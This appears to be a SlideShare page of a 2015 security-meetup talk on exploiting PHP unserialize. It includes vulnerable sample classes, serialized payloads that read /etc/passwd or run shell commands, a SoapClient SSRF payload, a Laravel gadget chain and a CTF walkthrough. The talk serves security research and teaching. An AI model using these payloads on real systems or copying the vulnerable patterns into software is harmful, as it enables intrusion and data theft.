Security Meetup 22 октября. «PHP Unserialize Exploiting». Павел Топорков. Лаборатория Касперского
2 likes11,354 views
This document discusses exploiting PHP unserialization vulnerabilities. It begins by introducing the presenter and explaining why unserialization is insecure, as magic methods like __destruct can be executed after unserialization. Potential exploits are demonstrated through examples, including using unserialization to execute system commands and perform SSRF attacks. The document also notes that many PHP frameworks and libraries contain classes that could enable chaining multiple exploits through unserialization. It then describes the presenter's tool for analyzing PHP code to find possible exploit chains for unserialization vulnerabilities.
![Vulnerable example
<?php
class A {
public $exitCmd;
public function __destruct(){
system($this->exitCmd);
}
}
unserialize($_GET['a']);
?>
?a=O:1:"A":{s:7:"exitCmd";s:15:"cat /etc/passwd"}](https://image.slidesharecdn.com/securitymeetup22-151023143741-lva1-app6892/85/Security-Meetup-22-PHP-Unserialize-Exploiting-6-320.jpg)
![SSRF
Unserializing SoapClient can provide SSRF with CRLF
injection.
O:10:"SoapClient":3:{s:3:"uri";s:18:"http://hostname/3%0a1";
s:8:"location";s:23:"http://hostname/123";s:13:"
_soap_version";i:1;}
[0] https://www.youtube.com/watch?v=5AdVQzUB6iM
[1] http://raz0r.name/talks/confidence-2013-php-object-injection-revisited/](https://image.slidesharecdn.com/securitymeetup22-151023143741-lva1-app6892/85/Security-Meetup-22-PHP-Unserialize-Exploiting-12-320.jpg)
![WhoEver! (step 2)
$params = unserialize($_GET["params"]);
...
class User {
public function save(){
...
Database::query(
"INSERT INTO users (sess, user) VALUES('$this->sessid', '%s') ON
DUPLICATE KEY UPDATE user='%s'", array($user, $user));
}
public function __destruct(){
if ($this->needSave) $this->save();
}
}](https://image.slidesharecdn.com/securitymeetup22-151023143741-lva1-app6892/85/Security-Meetup-22-PHP-Unserialize-Exploiting-19-320.jpg)
![WhoEver! (step 3)
public static function load($sessid){
...
$result = Database::query("SELECT user FROM users WHERE sess='$sessid'");
if ($result){
return unserialize($result["user"]);
} else return new User($sessid);
}
Now we can exploit another unserialize with more classes
available.
Let's try to build chain...](https://image.slidesharecdn.com/securitymeetup22-151023143741-lva1-app6892/85/Security-Meetup-22-PHP-Unserialize-Exploiting-20-320.jpg)
![WhoEver! (step 3)
class Database {
public function __destruct(){
$this->db->close();
}
}
class Engine {
public function __call($name, $params) {
...
return $this->loader->load($name,
$shared);
}
}
class Loader {
public function load($name, $shared){
...
list($class, $params, $callback) =
$this->classes[$name];
...
$this->newInstance($class, $params);
...
}
public function newInstance($class,
$params) {
if (is_callable($class)) {
return call_user_func_array($class,
$params);
}
}](https://image.slidesharecdn.com/securitymeetup22-151023143741-lva1-app6892/85/Security-Meetup-22-PHP-Unserialize-Exploiting-21-320.jpg)
Security Meetup 22 октября. «PHP Unserialize Exploiting». Павел Топорков. Лаборатория Касперского
- 1. PHP Unserialize Exploiting Mail.Ru Security Meetup. 22 Nov 2015 #securitymeetup
- 2. whoami Pavel Toporkov ● Work at Kaspersky Lab ● Security Researcher ● Bug Hunter ● RDot.Org team CTF player
- 3. why?
- 4. Unserialize unserialize — Creates a PHP value from a stored representation array("foo", "bar") ⇔ a:2:{i:0;s:3:"foo";i:1;s:3:"bar";}
- 5. Why it insecure? Magic methods can be executed after unserialization: __wakeup() __destruct() __toString() and so on...
- 6. Vulnerable example <?php class A { public $exitCmd; public function __destruct(){ system($this->exitCmd); } } unserialize($_GET['a']); ?> ?a=O:1:"A":{s:7:"exitCmd";s:15:"cat /etc/passwd"}
- 7. What if we won't use danger functions in magic methods?
- 8. More complex example <?php class DBConnect { public function __destruct(){ $this->db->close(); } } class Process { public function close(){ system("rm ${this->pidfile}.pid"); } }
- 9. Kohana (system/classes/Kohana/View.php) public function __toString(){ try { return $this->render(); } catch (Exception $e){ ... } } protected static function capture ($kohana_view_filename, array $kohana_view_data){ try { include $kohana_view_filename; } catch (Exception $e){ ... } } public function render($file){ ... View::capture($this->_file, $this->_data); }
- 10. Kohana Pwning POST /api.php HTTP/1.1 Host: hostname Content-Length: … Content-Type: application/x-www-form-urlencoded data=O:11:"Kohana_View":1:{s:8:"%00*%00_file";s:11:" /etc/passwd";}
- 11. What if there will no such chains in application code?
- 12. SSRF Unserializing SoapClient can provide SSRF with CRLF injection. O:10:"SoapClient":3:{s:3:"uri";s:18:"http://hostname/3%0a1"; s:8:"location";s:23:"http://hostname/123";s:13:" _soap_version";i:1;} [0] https://www.youtube.com/watch?v=5AdVQzUB6iM [1] http://raz0r.name/talks/confidence-2013-php-object-injection-revisited/
- 14. Composer Composer helps you declare, manage and install dependencies of PHP projects, ensuring you have the right stack everywhere. Actually it provide us a bunch of usable classes to build chains for unserialize exploiting. Just try to get size of your "vendor" directory.
- 15. What if we won't use unserialize with user's input data!
- 16. Another way PHP serialized data is often used to store PHP object in database. ● User sessions ● Application cache ● ...
- 17. WhoEver! PHD CTF 2015 Task Based on a true story. 0 solvers :(
- 18. WhoEver! (step 1) 1. Read robots.txt, find api.php file. 2. Find that api.php can process XML data. 3. Get the source code using XML External Entity. (composer. json and .git can help us to get all files)
- 19. WhoEver! (step 2) $params = unserialize($_GET["params"]); ... class User { public function save(){ ... Database::query( "INSERT INTO users (sess, user) VALUES('$this->sessid', '%s') ON DUPLICATE KEY UPDATE user='%s'", array($user, $user)); } public function __destruct(){ if ($this->needSave) $this->save(); } }
- 20. WhoEver! (step 3) public static function load($sessid){ ... $result = Database::query("SELECT user FROM users WHERE sess='$sessid'"); if ($result){ return unserialize($result["user"]); } else return new User($sessid); } Now we can exploit another unserialize with more classes available. Let's try to build chain...
- 21. WhoEver! (step 3) class Database { public function __destruct(){ $this->db->close(); } } class Engine { public function __call($name, $params) { ... return $this->loader->load($name, $shared); } } class Loader { public function load($name, $shared){ ... list($class, $params, $callback) = $this->classes[$name]; ... $this->newInstance($class, $params); ... } public function newInstance($class, $params) { if (is_callable($class)) { return call_user_func_array($class, $params); } }
- 22. Finding chains This project was 2MB. In real projects we have 100+MB of PHP source code. So finding chains to exploit unserialize is a big deal.
- 23. Let's code it!
- 24. Tool My approach: ● No static analysis. It slow and complex ● Just find starting point ● Then find all methods and check if it can be executed from this point. ● Repeat
- 25. Demo
- 26. Chain
- 27. Exploit (too long, cutted…) O:20:"IlluminateViewView":1:{s:10:"%00*%00factory";O:23:" IlluminateViewFactory":1:{s:9:"%00*%00events";O:42:" IlluminateFoundationConsoleServeCommand":3:{s:9:"%00*% 00output";O:43:" SymfonyComponentConsoleOutputNullOutput":0:{}s:8:"%00*% 00input";O:42:"SymfonyComponentConsoleInputArrayInput": 2:{s:10:"%00*%00options";a:2:{s:4:"host";s:12:"A;uname+-a; A";s:4:"port";s:2:"AA";}s:13:"%00*%00definition";O:47:" SymfonyComponentConsoleInputInputDefinition":1:{s:56:"% 00SymfonyComponentConsoleInputInputDefinition% 00options...
- 28. Results ● About 10 minutes to process 130MB of code ● Due to no static analysis it's extremely hard to auto- generate exploits P.S. Welcome to contribution!